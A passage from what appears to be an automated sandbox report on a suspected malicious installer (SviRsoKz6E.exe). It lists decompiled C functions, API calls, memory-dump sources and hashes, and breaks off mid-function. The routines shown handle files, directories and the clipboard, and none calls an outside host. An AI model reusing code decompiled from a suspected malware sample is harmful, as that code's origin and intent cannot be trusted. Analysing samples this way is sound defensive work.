                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                  • String ID:
                  • API String ID: 2547128583-0
                  • Opcode ID: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                  • Instruction ID: b1d6ada99e6651afe610309d4c68ede8e1123b1e5f34d771ce11ce336b0a7369
                  • Opcode Fuzzy Hash: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                  • Instruction Fuzzy Hash: 1AE086326042116BD21067705E0893B72A89E84700302443EF946F2144DB39EC35A76D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00405C5A, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                  Download Yara Rule
                  C-Code - Quality: 68%
                  			E00405C5A(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                  0x00405c5e
                  0x00405c6b
                  0x00405c80
                  0x00405c86

                  APIs
                  • GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\SviRsoKz6E.exe,80000000,00000003), ref: 00405C5E
                  • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C80
                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: File$AttributesCreate
                  • String ID:
                  • API String ID: 415043291-0
                  • Opcode ID: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                  • Instruction ID: ee59d6d0e1d409ab4f08bbdf592326cff3c7222ef74ae4255e7f212f1854b30f
                  • Opcode Fuzzy Hash: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                  • Instruction Fuzzy Hash: F5D09E31654201AFEF0D8F20DE16F2E7AA2EB84B00F11952CB782941E1DA715819AB19
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00405C35, Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00405C35(CHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesA(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}





                  0x00405c3a
                  0x00405c40
                  0x00405c45
                  0x00405c4e
                  0x00405c4e
                  0x00405c57

                  APIs
                  • GetFileAttributesA.KERNELBASE(?,?,0040584D,?,?,00000000,00405A30,?,?,?,?), ref: 00405C3A
                  • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405C4E
                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                  • Instruction ID: 59cc3d86ab4e26752c0bcc3731729734fb3652f4f3e26a658c09c1975061a851
                  • Opcode Fuzzy Hash: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                  • Instruction Fuzzy Hash: B6D0A932004021ABC2002728AE0888BBB50DB00270702CA35FDA4A22B1DB300C969A98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040572B, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040572B(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                  0x00405731
                  0x00405739
                  0x00000000
                  0x0040573f
                  0x00000000

                  APIs
                  • CreateDirectoryA.KERNELBASE(?,00000000,00403305,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403524,?,00000007,00000009,0000000B), ref: 00405731
                  • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 0040573F
                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: CreateDirectoryErrorLast
                  • String ID:
                  • API String ID: 1375471231-0
                  • Opcode ID: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                  • Instruction ID: fe143fb7e2c59eb3603aebef79fe73c29c1fae3f16fa91b3bf8fea648d0a9a1d
                  • Opcode Fuzzy Hash: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                  • Instruction Fuzzy Hash: 61C04C30604505EFD7515B209E09B177A94AB50781F15443DA146E10A0DF388455ED2D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A81E31, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00A81DE6: GetFileAttributesW.KERNELBASE(?,?,8A5B2944,?,?,?,00000000), ref: 00A81E07
                  • CreateDirectoryW.KERNELBASE(?,00000000,?,00000000,1A6CF026,?,?,?,00A822DE,?,?,?,?,00A81B36,?,?), ref: 00A81E67
                  Memory Dump Source
                  • Source File: 00000000.00000002.200598798.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: false
                  Similarity
                  • API ID: AttributesCreateDirectoryFile
                  • String ID:
                  • API String ID: 3401506121-0
                  • Opcode ID: 76953e4cf74284d3744f9ebd8d72ff76d5467ccc814e49a4f7823f9db84c26d6
                  • Instruction ID: 1c7cc1eb6328900ddc368c9fc4e8bda3bc454a17953ade6db553a3b6d99acf90
                  • Opcode Fuzzy Hash: 76953e4cf74284d3744f9ebd8d72ff76d5467ccc814e49a4f7823f9db84c26d6
                  • Instruction Fuzzy Hash: 4CE01A70E64208BAEF20BFB0CD46EBE7ABCEF02741F504975BD15D5121E6329E52A760
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A81DE6, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                  Download Yara Rule
                  APIs
                  • GetFileAttributesW.KERNELBASE(?,?,8A5B2944,?,?,?,00000000), ref: 00A81E07
                  Memory Dump Source
                  • Source File: 00000000.00000002.200598798.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: false
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: 55bb7ba6196abbe36ef6ff5fa49b81e274a521c48dc1331013c1293efeb5a52f
                  • Instruction ID: 297a011cec8409a8eb691c98c49031b873871c9e71290d43bc3834a78244d553
                  • Opcode Fuzzy Hash: 55bb7ba6196abbe36ef6ff5fa49b81e274a521c48dc1331013c1293efeb5a52f
                  • Instruction Fuzzy Hash: C3F0C971C0020CEFDF10FFA8D919ABDBBB4EF01315F5086A5E82466291E7754EA2DB51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00405D01, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00405D01(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                  0x00405d05
                  0x00405d15
                  0x00405d1d
                  0x00000000
                  0x00405d24
                  0x00000000
                  0x00405d26

                  APIs
                  • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000020,?,00403295,00000000,004138E0,00000020,004138E0,00000020,000000FF,00000004,00000000), ref: 00405D15
                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: FileWrite
                  • String ID:
                  • API String ID: 3934441357-0
                  • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                  • Instruction ID: 9463c3abe6280d084d74f54212381f1c7099d27a46d02ce49af031ea16a2316f
                  • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                  • Instruction Fuzzy Hash: 8BE0E63251065DABEF105F55AC04AEB775CEF15350F008437F955E3150D671E8619BA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00405CD2, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00405CD2(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                  0x00405cd6
                  0x00405ce6
                  0x00405cee
                  0x00000000
                  0x00405cf5
                  0x00000000
                  0x00405cf7

                  APIs
                  • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032C7,00000000,00000000,00403124,000000FF,00000004,00000000,00000000,00000000), ref: 00405CE6
                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: FileRead
                  • String ID:
                  • API String ID: 2738559852-0
                  • Opcode ID: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                  • Instruction ID: 0f3a91911b7368544d0479776f9460b67210371169305fae4b72b28e49471388
                  • Opcode Fuzzy Hash: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                  • Instruction Fuzzy Hash: 56E0EC3221835EEBEF109E559C04EEB7B6CEB05360F044437FD5AE2150D671E861ABA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004032CA, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004032CA(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                  0x004032d8
                  0x004032de

                  APIs
                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403066,?), ref: 004032D8
                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: FilePointer
                  • String ID:
                  • API String ID: 973152223-0
                  • Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                  • Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
                  • Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                  • Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A8101F, Relevance: 1.3, APIs: 1, Instructions: 16sleepCOMMON
                  Download Yara Rule
                  APIs
                  • Sleep.KERNELBASE(?,?,034CF0BF), ref: 00A81044
                  Memory Dump Source
                  • Source File: 00000000.00000002.200598798.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: false
                  Similarity
                  • API ID: Sleep
                  • String ID:
                  • API String ID: 3472027048-0
                  • Opcode ID: 532f74bc6037da364466723037ba84a3085f26033e99e41e075069366fed64a0
                  • Instruction ID: c6c13b717d1f674d39afacec33303c1d8fcf3db09d83fbbde57f27ae365341cf
                  • Opcode Fuzzy Hash: 532f74bc6037da364466723037ba84a3085f26033e99e41e075069366fed64a0
                  • Instruction Fuzzy Hash: 60D017B1860308BBCB14EBA0C94A86EBB6CDB01301F10819AB8006A202EA759A109764
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  Function 00405326, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282windowclipboardmemoryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 96%
                  			E00405326(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				int _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t87;
				struct HWND__* _t89;
				long _t90;
				int _t95;
				int _t96;
				long _t99;
				void* _t102;
				intOrPtr _t124;
				struct HWND__* _t128;
				int _t150;
				int _t153;
				long _t157;
				struct HWND__* _t161;
				struct HMENU__* _t163;
				long _t165;
				void* _t166;
				char* _t167;
				char* _t168;
				int _t169;

				_t87 =  *0x423f04; // 0x0
				_t157 = _a8;
				_t150 = 0;
				_v8 = _t87;
				if(_t157 != 0x110) {
					__eflags = _t157 - 0x405;
					if(_t157 == 0x405) {
						CloseHandle(CreateThread(0, 0, E004052BA, GetDlgItem(_a4, 0x3ec), 0,  &_a8));
					}
					__eflags = _t157 - 0x111;
					if(_t157 != 0x111) {
						L17:
						__eflags = _t157 - 0x404;
						if(_t157 != 0x404) {
							L25:
							__eflags = _t157 - 0x7b;
							if(_t157 != 0x7b) {
								goto L20;
							}
							_t89 = _v8;
							__eflags = _a12 - _t89;
							if(_a12 != _t89) {
								goto L20;
							}
							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
							__eflags = _t90 - _t150;
							_a12 = _t90;
							if(_t90 <= _t150) {
								L36:
								return 0;
							}
							_t163 = CreatePopupMenu();
							AppendMenuA(_t163, _t150, 1, E00406154(_t150, _t157, _t163, _t150, 0xffffffe1));
							_t95 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t153 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v24);
								_t95 = _v24.left;
								_t153 = _v24.top;
							}
							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
							__eflags = _t96 - 1;
							if(_t96 == 1) {
								_t165 = 1;
								__eflags = 1;
								_v56 = _t150;
								_v44 = 0x420d28;
								_v40 = 0x1000;
								_a4 = _a12;
								do {
									_a4 = _a4 - 1;
									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
									__eflags = _a4 - _t150;
									_t165 = _t165 + _t99 + 2;
								} while (_a4 != _t150);
								OpenClipboard(_t150);
								EmptyClipboard();
								_t102 = GlobalAlloc(0x42, _t165);
								_a4 = _t102;
								_t166 = GlobalLock(_t102);
								do {
									_v44 = _t166;
									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
									 *_t167 = 0xd;
									_t168 = _t167 + 1;
									 *_t168 = 0xa;
									_t166 = _t168 + 1;
									_t150 = _t150 + 1;
									__eflags = _t150 - _a12;
								} while (_t150 < _a12);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x423eec - _t150; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x424728, 8);
							__eflags =  *0x4247cc - _t150;
							if( *0x4247cc == _t150) {
								E004051E8( *((intOrPtr*)( *0x420500 + 0x34)), _t150);
							}
							E0040411E(1);
							goto L25;
						}
						 *0x4200f8 = 2;
						E0040411E(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E004041AC(_t157, _a12, _a16);
						}
						ShowWindow( *0x423ef0, _t150);
						ShowWindow(_v8, 8);
						E0040417A(_v8);
						goto L17;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_t169 = 2;
				_v56 = _t169;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t124 =  *0x424734;
				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
				_a8 =  *((intOrPtr*)(_t124 + 0x60));
				 *0x423ef0 = GetDlgItem(_a4, 0x403);
				 *0x423ee8 = GetDlgItem(_a4, 0x3ee);
				_t128 = GetDlgItem(_a4, 0x3f8);
				 *0x423f04 = _t128;
				_v8 = _t128;
				E0040417A( *0x423ef0);
				 *0x423ef4 = E00404A6B(4);
				 *0x423f0c = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(_t169);
				SendMessageA(_v8, 0x101b, 0,  &_v56);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a12 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a12);
					SendMessageA(_v8, 0x1026, 0, _a12);
				}
				if(_a8 >= _t150) {
					SendMessageA(_v8, 0x1024, _t150, _a8);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00404145(_a4);
				if(( *0x42473c & 0x00000003) != 0) {
					ShowWindow( *0x423ef0, _t150);
					if(( *0x42473c & 0x00000002) != 0) {
						 *0x423ef0 = _t150;
					} else {
						ShowWindow(_v8, 8);
					}
					E0040417A( *0x423ee8);
				}
				_t161 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t161, 0x401, _t150, 0x75300000);
				if(( *0x42473c & 0x00000004) != 0) {
					SendMessageA(_t161, 0x409, _t150, _a8);
					SendMessageA(_t161, 0x2001, _t150, _a12);
				}
				goto L36;
			}



































                  0x0040532c
                  0x00405334
                  0x00405337
                  0x0040533f
                  0x00405342
                  0x004054d1
                  0x004054d7
                  0x004054fb
                  0x004054fb
                  0x00405507
                  0x0040550d
                  0x0040552f
                  0x0040552f
                  0x00405535
                  0x0040558a
                  0x0040558a
                  0x0040558d
                  0x00000000
                  0x00000000
                  0x0040558f
                  0x00405592
                  0x00405595
                  0x00000000
                  0x00000000
                  0x0040559f
                  0x004055a5
                  0x004055a7
                  0x004055aa
                  0x004056a7
                  0x00000000
                  0x004056a7
                  0x004055b9
                  0x004055c5
                  0x004055ce
                  0x004055d5
                  0x004055d9
                  0x004055dc
                  0x004055e5
                  0x004055eb
                  0x004055ee
                  0x004055ee
                  0x004055fe
                  0x00405604
                  0x00405607
                  0x00405612
                  0x00405612
                  0x00405613
                  0x00405616
                  0x0040561d
                  0x00405624
                  0x0040562c
                  0x0040562c
                  0x0040563a
                  0x00405640
                  0x00405643
                  0x00405643
                  0x0040564a
                  0x00405650
                  0x00405659
                  0x00405660
                  0x00405669
                  0x0040566b
                  0x0040566e
                  0x0040567d
                  0x0040567f
                  0x00405682
                  0x00405683
                  0x00405686
                  0x00405687
                  0x00405688
                  0x00405688
                  0x00405690
                  0x0040569b
                  0x004056a1
                  0x004056a1
                  0x00000000
                  0x00405607
                  0x00405537
                  0x0040553d
                  0x0040556b
                  0x0040556d
                  0x00405573
                  0x0040557e
                  0x0040557e
                  0x00405585
                  0x00000000
                  0x00405585
                  0x00405541
                  0x0040554b
                  0x00000000
                  0x0040550f
                  0x0040550f
                  0x00405515
                  0x00405550
                  0x00000000
                  0x00405557
                  0x0040551e
                  0x00405525
                  0x0040552a
                  0x00000000
                  0x0040552a
                  0x0040550d
                  0x00405348
                  0x0040534c
                  0x00405354
                  0x00405358
                  0x0040535b
                  0x0040535e
                  0x00405361
                  0x00405364
                  0x00405365
                  0x00405366
                  0x0040537f
                  0x00405382
                  0x0040538c
                  0x0040539b
                  0x004053a3
                  0x004053ab
                  0x004053b0
                  0x004053b3
                  0x004053bf
                  0x004053c8
                  0x004053d1
                  0x004053f3
                  0x004053f9
                  0x0040540a
                  0x0040540f
                  0x0040541d
                  0x0040542b
                  0x0040542b
                  0x00405430
                  0x0040543e
                  0x0040543e
                  0x00405443
                  0x00405446
                  0x0040544b
                  0x00405457
                  0x00405460
                  0x0040546d
                  0x0040547c
                  0x0040546f
                  0x00405474
                  0x00405474
                  0x00405488
                  0x00405488
                  0x0040549c
                  0x004054a5
                  0x004054ae
                  0x004054be
                  0x004054ca
                  0x004054ca
                  0x00000000

                  APIs
                  • GetDlgItem.USER32 ref: 00405385
                  • GetDlgItem.USER32 ref: 00405394
                  • GetClientRect.USER32 ref: 004053D1
                  • GetSystemMetrics.USER32 ref: 004053D8
                  • SendMessageA.USER32(?,0000101B,00000000,?), ref: 004053F9
                  • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040540A
                  • SendMessageA.USER32(?,00001001,00000000,?), ref: 0040541D
                  • SendMessageA.USER32(?,00001026,00000000,?), ref: 0040542B
                  • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040543E
                  • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405460
                  • ShowWindow.USER32(?,00000008), ref: 00405474
                  • GetDlgItem.USER32 ref: 00405495
                  • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004054A5
                  • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004054BE
                  • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004054CA
                  • GetDlgItem.USER32 ref: 004053A3
                    • Part of subcall function 0040417A: SendMessageA.USER32(00000028,?,00000001,00403FAA), ref: 00404188
                  • GetDlgItem.USER32 ref: 004054E6
                  • CreateThread.KERNEL32 ref: 004054F4
                  • CloseHandle.KERNEL32(00000000), ref: 004054FB
                  • ShowWindow.USER32(00000000), ref: 0040551E
                  • ShowWindow.USER32(?,00000008), ref: 00405525
                  • ShowWindow.USER32(00000008), ref: 0040556B
                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040559F
                  • CreatePopupMenu.USER32 ref: 004055B0
                  • AppendMenuA.USER32 ref: 004055C5
                  • GetWindowRect.USER32 ref: 004055E5
                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055FE
                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040563A
                  • OpenClipboard.USER32(00000000), ref: 0040564A
                  • EmptyClipboard.USER32 ref: 00405650
                  • GlobalAlloc.KERNEL32(00000042,?), ref: 00405659
                  • GlobalLock.KERNEL32 ref: 00405663
                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405677
                  • GlobalUnlock.KERNEL32(00000000), ref: 00405690
                  • SetClipboardData.USER32 ref: 0040569B
                  • CloseClipboard.USER32 ref: 004056A1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                  • String ID: (B
                  • API String ID: 590372296-3831730363
                  • Opcode ID: 49997f41eb2f9c722dfb0406d167bbe14a0a63cc83ca584289ce1d984f626ed1
                  • Instruction ID: fe21aa704c045a880c187f0605a512594e5ece0db8e286b19571ae5c45aa8885
                  • Opcode Fuzzy Hash: 49997f41eb2f9c722dfb0406d167bbe14a0a63cc83ca584289ce1d984f626ed1
                  • Instruction Fuzzy Hash: 23A15B71900608BFDB119FA4DE89EAE7B79FB48355F00403AFA41BA1A0C7794E51DF58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004045D7, Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 274stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 78%
                  			E004045D7(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed char _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed char* _t160;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x420500;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x425000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E004057C1(0x3fb, _t146);
					E0040639C(_t146);
				}
				_t166 = _a4;
